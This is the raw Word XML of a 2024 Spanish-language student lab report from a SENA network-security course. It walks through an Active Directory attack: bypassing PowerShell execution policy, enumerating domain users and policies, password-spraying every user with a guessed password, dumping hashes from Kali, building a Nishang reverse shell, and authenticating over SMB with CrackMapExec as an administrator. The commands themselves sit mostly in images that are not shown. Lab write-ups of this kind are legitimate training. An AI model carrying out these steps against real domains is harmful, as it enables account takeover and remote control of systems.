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A42B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REGIONAL ANTIOQUIA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1606C83C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CENTRO DE SERVICIOS Y GESTIÓN EMPRESARIAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3C6BA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1F9E46B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5ABCAA0C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2D46BA6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A32783F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D3C0AE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37A8601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E73784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ED92FAC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32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:color w:val="262626"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>GESTIÓN DE REDES DE DATOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D06E66C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(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2803649</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC2B0B3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401996C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C678846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AE3963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806529D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59BFEF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C9130D6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Presentado por</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390B32D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Jessid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Restrepo Valencia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA97B2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69E6715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896FF48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63CC3D7A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2D5F66BC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FF505FA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5F30CD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840060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5B33C1F6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6BA4D388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2D53E81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6FB928D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C31D6AD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F05B88A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dellín, 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39854C31" w14:textId="77777777" w:rsidR="0002556D" w:rsidRDefault="0002556D" w:rsidP="0002556D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C8C74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691893E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REGIONAL ANTIOQUIA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084AEDF0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CENTRO DE SERVICIOS Y GESTIÓN EMPRESARIAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D96BE9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5B19AB39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2CA8ECA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2FD4902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8AA3D6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60242C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FC7B1A5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 xml:space="preserve">TECNOLOGÍA EN GESTION DE REDES DE DATOS </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF6BE03" w14:textId="77777777" w:rsidR="0002556D" w:rsidRDefault="0002556D" w:rsidP="0002556D">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center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(2803649)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E4665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336C4A3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5722817F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61CECEA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55DA1376" w14:textId="77777777" w:rsidR="0002556D" w:rsidRDefault="0002556D" w:rsidP="0002556D">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ADMINISTRACIÓN DE HARDWARE Y SOFTWARE DE LA SEGURIDAD EN LA RED </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A298450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5C5C0DD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Instructor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: Iván Alejandro Arias Gómez </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E84A2EB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216AF9E6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2001AEF2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BA12AD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0F56B6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225F41C" w14:textId="26A02603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b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Active </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Directory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="551297BC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553DEAA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D91F1A8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Presentado por</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F081F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Jessid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Restrepo Valencia – CC 1035442688</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB6A297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C886E19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>Grupo de formación:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2803649</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F476A5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5786F50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852FB98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328AE484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56D5DD1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1FB4E7CE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7A2D8B3F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4043DFAE" w14:textId="77777777" w:rsidR="0002556D" w:rsidRDefault="0002556D" w:rsidP="0002556D">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06E8F05A" w14:textId="77777777" w:rsidR="0002556D" w:rsidRDefault="0002556D" w:rsidP="0002556D">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:color w:val="262626"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:color w:val="262626"/>
        </w:rPr>
        <w:t>MEDELLÍN, 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D02AD3" w14:textId="0E4E17EB" w:rsidR="001C1612" w:rsidRDefault="001C1612"/>
    <w:p w14:paraId="64F853C8" w14:textId="77777777" w:rsidR="001C1612" w:rsidRDefault="001C1612">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0E7291" w14:textId="77777777" w:rsidR="00EB5FA2" w:rsidRDefault="00EB5FA2"/>
    <w:p w14:paraId="6345E9C9" w14:textId="5D152F9B" w:rsidR="00220A17" w:rsidRDefault="00F0292E">
      <w:r w:rsidRPr="00F0292E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DCAC317" wp14:editId="3E012344">
            <wp:extent cx="5760720" cy="4174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8B20" w14:textId="4B363514" w:rsidR="00F0292E" w:rsidRDefault="00F0292E">
      <w:r>
        <w:t xml:space="preserve">Utilizamos el comando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">bypass, </w:t>
      </w:r>
      <w:r w:rsidR="00CD34D9">
        <w:t xml:space="preserve"> que</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00CD34D9">
        <w:t xml:space="preserve"> sirve para ejecutar PowerShell con la política de ejecución establecida como </w:t>
      </w:r>
      <w:r w:rsidR="00CD34D9">
        <w:rPr>
          <w:rStyle w:val="Textoennegrita"/>
        </w:rPr>
        <w:t>Bypass</w:t>
      </w:r>
      <w:r w:rsidR="00CD34D9">
        <w:t xml:space="preserve"> , lo que significa que </w:t>
      </w:r>
      <w:r w:rsidR="00CD34D9">
        <w:rPr>
          <w:rStyle w:val="Textoennegrita"/>
        </w:rPr>
        <w:t>ignora cualquier restricción de ejecución de scripts que esté configurada en el sistema</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4396F962" w14:textId="691D61D3" w:rsidR="00F0292E" w:rsidRDefault="00F0292E">
      <w:r w:rsidRPr="00F0292E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CC6BADF" wp14:editId="63F05CAD">
            <wp:extent cx="5760720" cy="17767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0E4" w14:textId="77777777" w:rsidR="00CD34D9" w:rsidRDefault="00CD34D9">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Get-DomainSID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: se utiliza en entornos de Active </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Directory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> para obtener el </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Textoennegrita"/>
        </w:rPr>
        <w:t>SID</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Identificador de seguridad) del dominio al que pertenece el sistema. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2DAE9A" w14:textId="6E866E03" w:rsidR="00F0292E" w:rsidRDefault="00CD34D9">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Get-DomainpolicyData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: Con este comando podemos echar un vistazo a las políticas de nuestro servidor de dominio </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36375C41" w14:textId="52CCF901" w:rsidR="00CD34D9" w:rsidRDefault="00CD34D9">
      <w:r w:rsidRPr="00CD34D9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33B9C0B2" wp14:editId="7822315F">
            <wp:extent cx="3458058" cy="295316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7FFF" w14:textId="095E88A7" w:rsidR="00CD34D9" w:rsidRDefault="00CD34D9">
      <w:r>
        <w:t xml:space="preserve">Para listar el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> de todos los usuarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAD1290" w14:textId="2D39111B" w:rsidR="00CD34D9" w:rsidRDefault="000F271F">
      <w:r w:rsidRPr="000F271F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FFDB395" wp14:editId="77D47929">
            <wp:extent cx="5760720" cy="1873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25A" w14:textId="14455C46" w:rsidR="000F271F" w:rsidRDefault="000F271F">
      <w:r>
        <w:t xml:space="preserve">Sirve para obtener información </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> detallada del controlador de domino</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75595E54" w14:textId="43F1A719" w:rsidR="000F271F" w:rsidRDefault="000F271F">
      <w:r w:rsidRPr="000F271F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D8D76CF" wp14:editId="3713DA90">
            <wp:extent cx="5544324" cy="452500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305E" w14:textId="44AAD944" w:rsidR="000F271F" w:rsidRDefault="000F271F">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Aca</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> podemos buscar la información completa de un usuario </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">en </w:t>
      </w:r>
      <w:r w:rsidR="001054F1">
        <w:t xml:space="preserve"> el</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="001054F1">
        <w:t xml:space="preserve"> directorio activo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695DEE27" w14:textId="53862FF3" w:rsidR="00731DEF" w:rsidRDefault="00731DEF"/>
    <w:p w14:paraId="5DEA58B0" w14:textId="48B51A32" w:rsidR="00731DEF" w:rsidRDefault="00731DEF">
      <w:r w:rsidRPr="00731DEF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33B8B096" wp14:editId="2DFF04A8">
            <wp:extent cx="5760720" cy="400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A57" w14:textId="13FC5AB5" w:rsidR="00EB5FA2" w:rsidRDefault="00EB5FA2">
      <w:r>
        <w:t xml:space="preserve">Con este comando </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>podemos  importar</w:t>
      </w:r>
      <w:proofErr w:type="gram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53308AD9" w14:textId="38B22DC1" w:rsidR="00EB5FA2" w:rsidRDefault="00EB5FA2">
      <w:r>
        <w:t xml:space="preserve">Y con el siguiente </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>podemos  listar</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a todos los usuarios del domino, seleccionando </w:t>
      </w:r>
      <w:r w:rsidR="00E809C0">
        <w:t xml:space="preserve"> solamente el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E809C0">
        <w:t>samaccountname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E809C0">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77566520" w14:textId="0D3927C4" w:rsidR="00731DEF" w:rsidRDefault="00731DEF">
      <w:r w:rsidRPr="00731DEF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05AD2C58" wp14:editId="5F8AE2F7">
            <wp:extent cx="3629532" cy="37152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51E8" w14:textId="67CE2AF6" w:rsidR="00E809C0" w:rsidRDefault="00E809C0"/>
    <w:p w14:paraId="6B531EF8" w14:textId="6ED7F6BE" w:rsidR="00E809C0" w:rsidRDefault="00E809C0"/>
    <w:p w14:paraId="6E21D187" w14:textId="77777777" w:rsidR="00E809C0" w:rsidRDefault="00E809C0"/>
    <w:p w14:paraId="4E97C9DD" w14:textId="33CB55E0" w:rsidR="00E809C0" w:rsidRDefault="00E809C0">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Obtuvimos unas credenciales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121769C8" w14:textId="1AAA5296" w:rsidR="00731DEF" w:rsidRDefault="00731DEF">
      <w:r w:rsidRPr="00731DEF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="665CA275" wp14:editId="6F771118">
            <wp:extent cx="5760720" cy="368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00AA" w14:textId="70A2FB1A" w:rsidR="00E809C0" w:rsidRDefault="00E809C0">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Ingresamos  con</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> runas y probamos la contraseña obtenida.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD0983F" w14:textId="37880BA8" w:rsidR="00731DEF" w:rsidRDefault="00731DEF">
      <w:r w:rsidRPr="00731DEF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C6843EB" wp14:editId="2618CF46">
            <wp:extent cx="5760720" cy="28505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591" w14:textId="5BC68E33" w:rsidR="00E809C0" w:rsidRDefault="00E809C0">
      <w:r>
        <w:t>C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3ECACE" w14:textId="6E2C58EE" w:rsidR="00D46298" w:rsidRDefault="00D46298">
      <w:r w:rsidRPr="00D46298">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77CC0975" wp14:editId="50A53D45">
            <wp:extent cx="5760720" cy="30333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8CA3" w14:textId="77777777" w:rsidR="00D46298" w:rsidRDefault="00D46298"/>
    <w:p w14:paraId="1B9360E8" w14:textId="6ED64193" w:rsidR="009158B6" w:rsidRDefault="009158B6">
      <w:r w:rsidRPr="009158B6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16D46A92" wp14:editId="298A282A">
            <wp:extent cx="5760720" cy="36112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85D0" w14:textId="58803522" w:rsidR="008A7103" w:rsidRDefault="008A7103"/>
    <w:p w14:paraId="49833883" w14:textId="4A1BC74A" w:rsidR="008A7103" w:rsidRDefault="008A7103"/>
    <w:p w14:paraId="6B6B697C" w14:textId="052AFC14" w:rsidR="001D5294" w:rsidRDefault="00EB5FA2" w:rsidP="008A7103">
      <w:r>
        <w:t xml:space="preserve">Primero que todo listamos a todos los usuarios para crear un archivo tipo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>txt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6977E77C" w14:textId="4F625CFC" w:rsidR="001D5294" w:rsidRDefault="00BC4CD3" w:rsidP="008A7103">
      <w:r w:rsidRPr="00BC4CD3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A8E4492" wp14:editId="4CC4406F">
            <wp:extent cx="5760720" cy="43652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893" cy="43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18E6" w14:textId="1FE8C7C8" w:rsidR="00BC4CD3" w:rsidRDefault="00BC4CD3" w:rsidP="008A7103">
      <w:r w:rsidRPr="00BC4CD3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A7B58A0" wp14:editId="2CF0A90C">
            <wp:extent cx="5760720" cy="15855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F4E2" w14:textId="4C8CF4B8" w:rsidR="00C93F12" w:rsidRDefault="00C93F12" w:rsidP="008A7103">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Aca</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> se hizo un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>passwordspay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a todos los usuarios anteriormente obtenidos, con la probable contraseña Changeme123!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291AB152" w14:textId="56950644" w:rsidR="00BC4CD3" w:rsidRDefault="00676176" w:rsidP="008A7103">
      <w:r w:rsidRPr="00676176">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75A83980" wp14:editId="3484E073">
            <wp:extent cx="5760720" cy="403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4D39" w14:textId="40E1AB2E" w:rsidR="00C93F12" w:rsidRDefault="00C93F12" w:rsidP="008A7103">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Aca</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> obtenemos los hashes desde Kali Linux </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE8B201" w14:textId="4A14B12A" w:rsidR="0048177B" w:rsidRDefault="0048177B" w:rsidP="008A7103">
      <w:r w:rsidRPr="0048177B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="336D6435" wp14:editId="6740D3CE">
            <wp:extent cx="5760720" cy="7200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7805" w14:textId="3D1951DF" w:rsidR="00C93F12" w:rsidRDefault="00C93F12" w:rsidP="008A7103">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AF2ED96" wp14:editId="24A420F4">
            <wp:extent cx="5760720" cy="3079750"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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A6C4" w14:textId="77777777" w:rsidR="00C93F12" w:rsidRDefault="00C93F12" w:rsidP="008A7103"/>
    <w:p w14:paraId="1F8E81EA" w14:textId="48009502" w:rsidR="00C93F12" w:rsidRDefault="00C93F12" w:rsidP="008A7103">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C53F43A" wp14:editId="15321341">
            <wp:extent cx="5760720" cy="1709420"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080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4F6F" w14:textId="472368D2" w:rsidR="00C93F12" w:rsidRDefault="00C93F12" w:rsidP="008A7103"/>
    <w:p w14:paraId="3479236C" w14:textId="69A44208" w:rsidR="00C93F12" w:rsidRDefault="00C93F12" w:rsidP="008A7103">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C074394" wp14:editId="4C942034">
            <wp:extent cx="5760720" cy="2976245"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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1042" w14:textId="68B0AE48" w:rsidR="00C93F12" w:rsidRDefault="00C93F12" w:rsidP="008A7103">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75F37173" wp14:editId="14DFCC63">
            <wp:extent cx="5760720" cy="471805"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445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E276" w14:textId="5FA9B46A" w:rsidR="00C93F12" w:rsidRDefault="00C93F12" w:rsidP="008A7103">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64366166" wp14:editId="15D3211B">
            <wp:extent cx="5760720" cy="631190"/>
            <wp:effectExtent l="0" t="0" r="0" b="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BC6" w14:textId="0528F784" w:rsidR="00C93F12" w:rsidRDefault="00C93F12" w:rsidP="008A7103">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FAC3323" wp14:editId="66EDFC44">
            <wp:extent cx="5760720" cy="2336800"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350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AD94" w14:textId="34102646" w:rsidR="000B6ACA" w:rsidRDefault="00AD1726" w:rsidP="008A7103">
      <w:r>
        <w:t xml:space="preserve">Para crear una reverse Shell </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nishang</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> primero hay que descargar el script </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>llamado  Invoke-PowerShellTcp.ps1</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2B9AB484" w14:textId="690C08C9" w:rsidR="000B6ACA" w:rsidRDefault="000B6ACA" w:rsidP="008A7103"/>
    <w:p w14:paraId="0DBA0940" w14:textId="6A9913F5" w:rsidR="000B6ACA" w:rsidRDefault="000B6ACA" w:rsidP="008A7103">
      <w:r w:rsidRPr="000B6ACA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E0DBF62" wp14:editId="603C74F5">
            <wp:extent cx="5760720" cy="5153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979E" w14:textId="4C32E523" w:rsidR="00AD1726" w:rsidRDefault="00AD1726" w:rsidP="008A7103">
      <w:r>
        <w:t xml:space="preserve">Una vez </w:t>
      </w:r>
      <w:r w:rsidR="00D46679">
        <w:t>descargada procedemos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a editarla con cualquier editor de texto en este caso nano.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BAA7DC" w14:textId="10058C0D" w:rsidR="000B6ACA" w:rsidRDefault="000B6ACA" w:rsidP="008A7103">
      <w:r w:rsidRPr="000B6ACA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66027FE0" wp14:editId="08F098DC">
            <wp:extent cx="4639322" cy="1228896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94C8" w14:textId="642E8887" w:rsidR="00AD1726" w:rsidRDefault="00AD1726" w:rsidP="008A7103">
      <w:r>
        <w:t xml:space="preserve">Y agregamos la línea que investigamos en internet para crear una reverse Shell con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Nishang</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D46679">
        <w:t>(se</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> agrega como última línea del script).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCA8D88" w14:textId="754AA4C3" w:rsidR="000B6ACA" w:rsidRDefault="000B6ACA" w:rsidP="008A7103">
      <w:r w:rsidRPr="000B6ACA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76CE2646" wp14:editId="0C8AE865">
            <wp:extent cx="5760720" cy="12611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79F" w14:textId="77777777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proofErr w:type="gram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  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rackmapexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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mb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225C899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rackMapExec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es una herramienta diseñada para la </w:t>
      </w:r>
      <w:proofErr w:type="spell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>post-explotación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en redes Windows. El módulo </w:t>
      </w:r>
      <w:proofErr w:type="spell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>smbindica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que se usará el protocolo SMB (el protocolo de partición de archivos en Windows) para interactuar con la máquina objetivo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8D568B" w14:textId="5A502084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  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3DFED8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>Esta es la dirección IP de la máquina objetivo sobre la que se está ejecutando el comando. En este caso, es el objetivo al que se va a conectar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4866711F" w14:textId="77777777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proofErr w:type="gram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 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</w:t>
      </w:r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 Administrador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1D0E8523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Indica el nombre de usuario con el que se está intentando autenticar en la máquina objetivo. Aquí, el nombre de usuario es </w:t>
      </w:r>
      <w:proofErr w:type="gram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dministrador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.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="51163F25" w14:textId="77777777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proofErr w:type="gram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 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</w:t>
      </w:r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 cs.org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5D814774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El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minio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rupo de trabajo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al que pertenece la máquina objetivo. En este caso, el dominio es </w:t>
      </w:r>
      <w:proofErr w:type="gram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s.org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.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="439F2540" w14:textId="77777777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proofErr w:type="gram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 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</w:t>
